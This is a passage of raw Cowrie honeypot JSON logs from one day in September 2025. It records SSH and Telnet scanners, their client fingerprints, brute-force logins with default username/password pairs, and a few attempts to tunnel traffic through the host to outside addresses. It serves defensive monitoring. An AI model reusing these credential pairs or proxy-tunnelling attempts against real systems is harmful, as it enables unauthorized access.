,"ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:41:45.735724Z","src_ip":"212.227.125.160","session":"c0cb8980237f"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-09-09T07:41:46.759480Z","src_ip":"212.227.125.160","session":"c0cb8980237f"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:41:48.219073Z","src_ip":"212.227.125.160","session":"c0cb8980237f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63312,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b2775691a2d","protocol":"ssh","message":"New connection: 217.72.205.35:63312 (1.2.3.4:22) [session: 9b2775691a2d]","sensor":"my-vps","timestamp":"2025-09-09T07:41:49.895318Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:41:49.896473Z","src_ip":"217.72.205.35","session":"9b2775691a2d"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":44364,"dst_ip":"1.2.3.4","dst_port":23,"session":"574e6185184d","protocol":"telnet","message":"New connection: 176.65.149.186:44364 (1.2.3.4:23) [session: 574e6185184d]","sensor":"my-vps","timestamp":"2025-09-09T07:42:28.372109Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:42:28.412136Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:42:28.427840Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T07:42:28.429013Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T07:42:28.429908Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50848,"dst_ip":"1.2.3.4","dst_port":22,"session":"28bf8d4fe98b","protocol":"ssh","message":"New connection: 212.227.125.160:50848 (1.2.3.4:22) [session: 28bf8d4fe98b]","sensor":"my-vps","timestamp":"2025-09-09T07:42:40.144066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:42:40.230277Z","src_ip":"212.227.125.160","session":"28bf8d4fe98b"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":60634,"dst_ip":"1.2.3.4","dst_port":22,"session":"bab750240722","protocol":"ssh","message":"New connection: 92.118.39.62:60634 (1.2.3.4:22) [session: bab750240722]","sensor":"my-vps","timestamp":"2025-09-09T07:43:19.760984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:43:19.762160Z","src_ip":"92.118.39.62","session":"bab750240722"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:43:19.792106Z","src_ip":"92.118.39.62","session":"bab750240722"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo123456","message":"login attempt [demo/demo123456] failed","sensor":"my-vps","timestamp":"2025-09-09T07:43:19.883201Z","src_ip":"92.118.39.62","session":"bab750240722"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:43:20.915253Z","src_ip":"92.118.39.62","session":"bab750240722"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42372,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb954cabd684","protocol":"telnet","message":"New connection: 212.227.125.160:42372 (1.2.3.4:23) [session: bb954cabd684]","sensor":"my-vps","timestamp":"2025-09-09T07:43:36.367180Z"}
{"eventid":"cowrie.session.closed","duration":13.842973709106445,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:43:50.210082Z","src_ip":"212.227.125.160","session":"bb954cabd684"}
{"eventid":"cowrie.session.closed","duration":"89.7","message":"Connection lost after 89.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:44:09.828812Z","src_ip":"212.227.125.160","session":"28bf8d4fe98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41398,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f75c126b46","protocol":"ssh","message":"New connection: 212.227.125.160:41398 (1.2.3.4:22) [session: 25f75c126b46]","sensor":"my-vps","timestamp":"2025-09-09T07:45:14.613804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:45:14.695495Z","src_ip":"212.227.125.160","session":"25f75c126b46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41418,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dfebc261380","protocol":"ssh","message":"New connection: 212.227.125.160:41418 (1.2.3.4:22) [session: 4dfebc261380]","sensor":"my-vps","timestamp":"2025-09-09T07:45:14.803976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:45:15.104577Z","src_ip":"212.227.125.160","session":"4dfebc261380"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:45:15.202938Z","src_ip":"212.227.125.160","session":"25f75c126b46"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:45:15.222759Z","src_ip":"212.227.125.160","session":"4dfebc261380"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:45:16.370349Z","src_ip":"212.227.125.160","session":"4dfebc261380"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-09-09T07:45:16.676019Z","session":"4dfebc261380"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T07:45:16.977792Z","src_ip":"212.227.125.160","session":"4dfebc261380"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T07:45:25.213018Z","src_ip":"212.227.125.160","session":"25f75c126b46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:45:28.431392Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.session.closed","duration":180.06312561035156,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:45:28.435161Z","src_ip":"176.65.149.186","session":"574e6185184d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47262,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad90fca923c","protocol":"ssh","message":"New connection: 212.227.235.229:47262 (1.2.3.4:22) [session: cad90fca923c]","sensor":"my-vps","timestamp":"2025-09-09T07:45:31.555970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:45:31.556773Z","src_ip":"212.227.235.229","session":"cad90fca923c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:45:31.641112Z","src_ip":"212.227.235.229","session":"cad90fca923c"}
{"eventid":"cowrie.login.failed","username":"userpublico","password":"userpublico","message":"login attempt [userpublico/userpublico] failed","sensor":"my-vps","timestamp":"2025-09-09T07:45:32.017496Z","src_ip":"212.227.235.229","session":"cad90fca923c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:45:33.104002Z","src_ip":"212.227.235.229","session":"cad90fca923c"}
{"eventid":"cowrie.session.closed","duration":"42.1","message":"Connection lost after 42.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:45:56.865610Z","src_ip":"212.227.125.160","session":"4dfebc261380"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26897,"dst_ip":"1.2.3.4","dst_port":22,"session":"730473a39e29","protocol":"ssh","message":"New connection: 212.227.125.160:26897 (1.2.3.4:22) [session: 730473a39e29]","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.355633Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.356800Z","src_ip":"212.227.125.160","session":"730473a39e29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27177,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecdffd5dd6df","protocol":"ssh","message":"New connection: 212.227.125.160:27177 (1.2.3.4:22) [session: ecdffd5dd6df]","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.469424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.470495Z","src_ip":"212.227.125.160","session":"ecdffd5dd6df"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.585476Z","src_ip":"212.227.125.160","session":"ecdffd5dd6df"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:46:11.931373Z","src_ip":"212.227.125.160","session":"ecdffd5dd6df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T07:46:12.048025Z","session":"ecdffd5dd6df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51200,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e926020fae","protocol":"ssh","message":"New connection: 212.227.125.160:51200 (1.2.3.4:22) [session: a5e926020fae]","sensor":"my-vps","timestamp":"2025-09-09T07:46:20.071929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:46:20.074349Z","src_ip":"212.227.125.160","session":"a5e926020fae"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:46:25.697831Z","src_ip":"212.227.125.160","session":"a5e926020fae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39128,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f061d2751db","protocol":"ssh","message":"New connection: 212.227.235.229:39128 (1.2.3.4:22) [session: 8f061d2751db]","sensor":"my-vps","timestamp":"2025-09-09T07:46:46.296936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:46:46.297994Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
